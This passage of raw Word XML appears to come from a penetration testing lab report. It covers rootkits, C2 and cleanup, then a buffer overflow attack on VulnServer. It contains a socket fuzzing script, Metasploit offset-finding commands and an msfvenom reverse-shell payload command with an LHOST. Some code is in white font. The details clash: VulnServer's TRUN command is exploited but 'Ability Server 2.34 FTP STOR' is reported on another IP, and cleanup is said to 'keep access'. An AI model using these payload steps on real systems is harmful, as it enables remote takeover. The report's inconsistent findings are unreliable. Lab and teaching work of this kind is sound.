        <w:t xml:space="preserve">ploy rootkits or stealthy malware that influence system behavior and mask harmful actions from system administrators and security monitoring tools. Rootkits are meant to blend into the operating system and stay unnoticed while giving me continued access and control over the compromised computers. </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r>
      <w:r w:rsidRPr="008757F4">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3. Maintaining Command and Control (C2):</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To keep control over hacked systems and coordinate additional operations inside the network environment, I construct command and control channels that permit remote communication and data exchange. These C2 channels may leverage encrypted communication protocols, covert channels, or hacked infrastructure to elude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detection</w:t>
      </w:r>
      <w:r w:rsidRPr="008757F4">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and retain stealth. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095C1339" w14:textId="77777777" w:rsidR="00C733A6" w:rsidRDefault="00C733A6" w:rsidP="00040110"/>
    <w:p w14:paraId="73051B7E" w14:textId="5FFB0BD8" w:rsidR="00117B2D" w:rsidRPr="00117B2D" w:rsidRDefault="00C733A6" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C733A6">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3.5 House Cleaning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FCA61D" w14:textId="77777777" w:rsidR="00117B2D" w:rsidRPr="00117B2D" w:rsidRDefault="00117B2D"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117B2D">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After penetration testing is over, the network environment must be cleaned up and restored to its original integrity and security. This process is known as the "House Cleaning" phase of the Network Penetration Testing Assessment. The goal of house cleaning is to make sure the network reverts to a safe condition, get rid of any evidence of the assessment, and remove any backdoors or harmful artifacts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687D6B64" w14:textId="77777777" w:rsidR="00117B2D" w:rsidRPr="00117B2D" w:rsidRDefault="00117B2D"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12C166DE" w14:textId="46B8283F" w:rsidR="00117B2D" w:rsidRPr="00117B2D" w:rsidRDefault="00117B2D" w:rsidP="00040110">
      <w:pPr>
        <w:spacing w:after="240"/>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pPr>
      <w:r w:rsidRPr="00117B2D">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Important Tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209404B4" w14:textId="6DA18D23" w:rsidR="00117B2D" w:rsidRPr="00117B2D" w:rsidRDefault="00117B2D"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117B2D">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 xml:space="preserve">1. Artifact Removal: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To</w:t>
      </w:r>
      <w:r w:rsidRPr="00117B2D">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keep access to the network environment, I methodically delete any artifacts, backdoors, or malicious payloads that were installed during the penetration testing evaluation. This entails erasing user accounts, wiping data, and uninstalling any scripts or applications that were added without authorization during the examination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69852DC0" w14:textId="77777777" w:rsidR="00117B2D" w:rsidRPr="00117B2D" w:rsidRDefault="00117B2D" w:rsidP="00040110">
      <w:pPr>
        <w:spacing w:after="240"/>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pPr>
    </w:p>
    <w:p w14:paraId="35392014" w14:textId="77777777" w:rsidR="00117B2D" w:rsidRPr="00117B2D" w:rsidRDefault="00117B2D"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117B2D">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 xml:space="preserve">2. System Reconfiguration: </w:t>
      </w:r>
      <w:r w:rsidRPr="00117B2D">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To get the network back to a safe condition, I adjust system settings, access limits, and security configurations after eliminating malicious artifacts and clearing the network environment. Changing passwords, installing security updates, and putting in place extra security measures might all be part of this to lessen the vulnerabilities and flaws found during the evaluation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B90665F" w14:textId="77777777" w:rsidR="00117B2D" w:rsidRPr="00117B2D" w:rsidRDefault="00117B2D"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0F3EAD6F" w14:textId="77777777" w:rsidR="00117B2D" w:rsidRDefault="00117B2D" w:rsidP="00040110">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117B2D">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3. Documentation and Reporting</w:t>
      </w:r>
      <w:r w:rsidRPr="00117B2D">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Lastly, I record and summarize the results of the penetration testing evaluation, including information on the vulnerabilities found, the methods of exploitation used, and suggestions for improvement and repair. The IT and security teams inside the company may use the insightful information and advice in this documentation to fix the vulnerabilities found and improve their security posture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A0012E" w14:textId="5F2E534E" w:rsidR="00B36AE6" w:rsidRPr="00117B2D" w:rsidRDefault="00B36AE6" w:rsidP="00133F79">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B36AE6">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="000000"/>
          <w:lang w:eastAsia="en-ZA"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.0 Attack Reports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0959FD82" w14:textId="77777777" w:rsidR="00B36AE6" w:rsidRPr="00B36AE6" w:rsidRDefault="00B36AE6" w:rsidP="00133F79">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36AE6">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>4.1 Attack 1: Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5F15C1" w14:textId="77777777" w:rsidR="00B36AE6" w:rsidRDefault="00B36AE6" w:rsidP="00133F79"/>
    <w:p w14:paraId="46D2696D" w14:textId="77777777" w:rsidR="00B36AE6" w:rsidRPr="00B36AE6" w:rsidRDefault="00B36AE6" w:rsidP="00133F79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36AE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1.1 Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11234C0C" w14:textId="77777777" w:rsidR="00B36AE6" w:rsidRDefault="00B36AE6" w:rsidP="00133F79"/>
    <w:p w14:paraId="148B10DD" w14:textId="2FFB5AE1" w:rsidR="00F22CC1" w:rsidRPr="00F22CC1" w:rsidRDefault="00EA7E3B" w:rsidP="00133F79">
      <w:pP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Buffer overflow is a software issue that develops when a computer sends more data to a buffer than it can process. In addition to potentially creating memory corruption, this may offer an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attacker</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access to execute arbitrary code. The target application in this attack scenario is VulnServer, a server software operating on Windows that possesses buffer overflow vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC24B14" w14:textId="77777777" w:rsidR="00B36AE6" w:rsidRPr="00B36AE6" w:rsidRDefault="00B36AE6" w:rsidP="00133F79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36AE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1.2 Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C714CF" w14:textId="77777777" w:rsidR="00B36AE6" w:rsidRDefault="00B36AE6" w:rsidP="00133F79"/>
    <w:p w14:paraId="24ECF667" w14:textId="48CF7165"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I attacked VulnServer's buffer overflow vulnerability by utilizing the systematic methods provided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below</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B59174" w14:textId="77777777"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1. Target Identification:</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The buffer overflow attack's principal target was identified to be the VulnServer program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D99E649" w14:textId="77777777"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34243B83" w14:textId="77777777"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2. Vulnerability Analysis:</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I was able to determine the particular buffer overflow vulnerability in VulnServer and discover the input parameters required to create the problem by performing both static and dynamic analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0BE4E2" w14:textId="77777777"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7C589933" w14:textId="1AB6D5EB"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3. Payload Crafting:</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I constructed a malicious payload that would take advantage of the buffer overflow vulnerability to take control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of </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the target system by employing both automated and human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tactics</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFA3754" w14:textId="77777777"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332990D2" w14:textId="7C1927B8"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4. Exploitation:</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I was able to successfully design a buffer overflow scenario and achieve elevated privileges for remote server access by running the produced payload against the target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application</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA59324" w14:textId="77777777"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37C8C50E" w14:textId="4F4A578A" w:rsid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5. Post-Exploitation:</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To highlight the probable effects of the buffer overflow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vulnerability</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I carried out post-exploitation actions including data exfiltration, privilege escalation, and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system</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modification after getting access to the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D8183A" w14:textId="77777777" w:rsid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7E9AB319" w14:textId="77777777" w:rsid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5FF3F33B" w14:textId="11261FB2" w:rsidR="00B36AE6" w:rsidRPr="00B36AE6" w:rsidRDefault="00B36AE6" w:rsidP="00EA7E3B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36AE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1.3 Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC70948" w14:textId="77777777" w:rsidR="00B36AE6" w:rsidRDefault="00B36AE6" w:rsidP="00133F79"/>
    <w:p w14:paraId="692D689B" w14:textId="77777777" w:rsidR="00EA7E3B" w:rsidRPr="00EA7E3B"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In answer to the buffer overflow attack against VulnServer, the following findings were made:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646ED5D2" w14:textId="0E12EF08" w:rsidR="00E86F19" w:rsidRDefault="00EA7E3B" w:rsidP="00EA7E3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The target PC was successfully hacked by an exploit of the buffer overflow vulnerability, enabling unauthorized remote access. With extra permissions on the target system, the attacker may have been able to steal data and acquire further access. The attack served as a reminder </w:t>
      </w:r>
      <w:r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lastRenderedPageBreak/>
        <w:t>of the relevance of input validation methods and safe coding standards in avoiding buffer overflow vulnerabilities and preventing unwanted access to important systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD5B128" w14:textId="77777777" w:rsidR="00EA7E3B" w:rsidRDefault="00EA7E3B" w:rsidP="00EA7E3B"/>
    <w:p w14:paraId="31534E7A" w14:textId="77777777" w:rsidR="00B36AE6" w:rsidRPr="00B36AE6" w:rsidRDefault="00B36AE6" w:rsidP="00133F79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36AE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability Exploited:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F65CF5" w14:textId="77777777" w:rsidR="00B36AE6" w:rsidRDefault="00B36AE6" w:rsidP="00133F79">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36AE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ability Server 2.34 FTP STOR Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D591D82" w14:textId="77777777" w:rsidR="00B36AE6" w:rsidRDefault="00B36AE6" w:rsidP="00133F79">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36AE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System Vulnerable:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 172.16.203.134</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECE03C1" w14:textId="01EAC406" w:rsidR="00B36AE6" w:rsidRPr="00133F79" w:rsidRDefault="00B36AE6" w:rsidP="00133F79">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t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36AE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability Explanation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA7E3B" w:rsidRPr="00EA7E3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Attackers may be able to seize control of the computer and execute any remote code they choose owing to this vulnerability. The operating system was different from the publicly known vulnerability, and it was revealed during the penetration test that an obsolete version of Ability Server was still active. To get the code to run successfully, the exploit needs to be recreated. A targeted attack was undertaken against the system after the vulnerability was modified, allowing the attacker total administrative access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2072E2F3" w14:textId="702860A8" w:rsidR="00B36AE6" w:rsidRPr="00133F79" w:rsidRDefault="00B36AE6" w:rsidP="00133F79">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t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00E905A9" w:rsidRPr="00E905A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability Fix:</w:t>
      </w:r>
      <w:r w:rsidR="00E905A9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0D0D0D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E905A9" w:rsidRPr="00133F79">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The identified buffer overflow vulnerability in Ability Server 2.34 can be remediated by applying the latest patch released by the software developers. This patch addresses the specific issue related to buffer overflow in the STOR field, thereby preventing attackers from exploiting the vulnerability to gain unauthorized access or execute arbitrary code on the system. Users are strongly advised to download and install the patch from the official website of the software publisher, available at </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidR="00E905A9" w:rsidRPr="00133F79">
          <w:rPr>
            <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-ZA"/>
            <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
              <w14:noFill/>
              <w14:prstDash w14:val="solid"/>
              <w14:miter w14:lim="400000"/>
            </w14:textOutline>
          </w:rPr>
          <w:t>http://www.code-crafters.com/abilityserver/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E905A9" w:rsidRPr="00133F79">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By regularly updating the software to the latest version, organizations can ensure that their systems are protected against known vulnerabilities and maintain a secure environment for their network infrastructure and sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727943F7" w14:textId="77777777" w:rsidR="00B36AE6" w:rsidRDefault="00B36AE6" w:rsidP="00133F79">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36AE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5040C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313143B5" w14:textId="40772537" w:rsidR="00B36AE6" w:rsidRDefault="00B36AE6" w:rsidP="00133F79">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36AE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proof of Concept Code Here:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA4F3B7" w14:textId="77777777" w:rsidR="00E905A9" w:rsidRPr="009D1C93" w:rsidRDefault="00E905A9" w:rsidP="00E905A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E905A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fuzzing the Target with Increasing Payload Sizes</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1C93">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68277BBE"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#!/usr/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC32048"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import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BA587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p>
    <w:p w14:paraId="74E01C00"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buffer=["A"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549F1F3D"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counter=100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777E4F15"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while len(buffer) &lt;= 30:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ACD65C"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buffer.append("A"*counter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A85978"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counter=counter+200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7D2676"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p>
    <w:p w14:paraId="55395CD9" w14:textId="7F25A38E"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for </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5040C">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">string in </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5040C">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>buffer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ABE4D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print "Fuzzing PASS with %s bytes" % len(string)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21762D06"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s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAA05C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connect=s.connect(('192.168.2.1',9999))  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EABE7BA"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s.recv(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E594E5"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s.send(('TRUN .' + string + '\r\n'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498E1C96"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s.recv(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEB8905"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s.send('EXIT\r\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40106A51" w14:textId="4FCE0C14" w:rsidR="00E905A9" w:rsidRPr="009D1C93"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  s.close()</w:t>
      </w:r>
      <w:r w:rsidR="00E905A9" w:rsidRPr="009D1C93">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CB77FD" w14:textId="0C29531A" w:rsidR="00E905A9" w:rsidRDefault="00E905A9" w:rsidP="00E905A9">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D1C93">
        <w:t>Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536A88BE" w14:textId="27EC648A" w:rsidR="00B5040C" w:rsidRDefault="00B5040C" w:rsidP="0087020B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5040C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32D9C5A5" wp14:editId="678017AA">
            <wp:extent cx="2372056" cy="2324424"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="83433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4552" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2372056" cy="2324424"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="633B6A00" w14:textId="711A58B7" w:rsidR="00B5040C" w:rsidRPr="009D1C93" w:rsidRDefault="00B5040C" w:rsidP="00174E66">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B5040C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ACA6031" wp14:editId="60D8E714">
            <wp:extent cx="4172532" cy="2867425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="32413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5914" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4172532" cy="2867425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C6F5E9" w14:textId="77777777" w:rsidR="00E905A9" w:rsidRPr="009D1C93" w:rsidRDefault="00E905A9" w:rsidP="00E905A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E905A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Determining Offset for EIP Overwrite</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1C93">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D4ACAE" w14:textId="77777777" w:rsidR="00E905A9" w:rsidRPr="009D1C93" w:rsidRDefault="00E905A9" w:rsidP="00E905A9">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9D1C93">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2300 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F18287" w14:textId="46A48556" w:rsidR="00E905A9" w:rsidRPr="009D1C93" w:rsidRDefault="00E905A9" w:rsidP="00E905A9">
      <w:r w:rsidRPr="009D1C93">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Screenshot: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E905A9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11CDA70C" wp14:editId="198E2A8A">
            <wp:extent cx="5934903" cy="3839111"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="122903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39171" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5934903" cy="3839111"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE0E3CD" w14:textId="688F1EE0" w:rsidR="00E905A9" w:rsidRDefault="00E905A9" w:rsidP="00E905A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E905A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Determining Offset for EIP Overwrite:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D21B277" w14:textId="2B259C83" w:rsidR="00E905A9" w:rsidRPr="00E905A9" w:rsidRDefault="00E905A9" w:rsidP="00E905A9">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E905A9">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 396F4338 -l 2300</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7080C52B" w14:textId="583A295A" w:rsidR="00E905A9" w:rsidRPr="00E905A9" w:rsidRDefault="00B5040C" w:rsidP="00E905A9">
      <w:r w:rsidRPr="009D1C93">
        <w:t>Screenshot:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B5040C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A514B7E" wp14:editId="2BCA0CE6">
            <wp:extent cx="5934903" cy="666843"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="75913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38964" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5934903" cy="666843"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C293D81" w14:textId="1718F916" w:rsidR="00E905A9" w:rsidRPr="009D1C93" w:rsidRDefault="00E905A9" w:rsidP="00E905A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E905A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Generating Payload with Shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1C93">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252923C7" w14:textId="77777777" w:rsidR="00E905A9" w:rsidRPr="009D1C93" w:rsidRDefault="00E905A9" w:rsidP="00E905A9">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9D1C93">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.1 LPORT=8080 -b "\x00" -f python -v shellcode </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364E5FB0" w14:textId="555378D1" w:rsidR="00E905A9" w:rsidRPr="009D1C93" w:rsidRDefault="00E905A9" w:rsidP="00174E66">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009D1C93">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Screenshot: </w:t>
      </w:r>
      <w:r w:rsidR="00B5040C" w:rsidRPr="00B5040C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E4ED9B7" wp14:editId="320341FC">
            <wp:extent cx="5934903" cy="3153215"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="195124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45423" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5934903" cy="3153215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
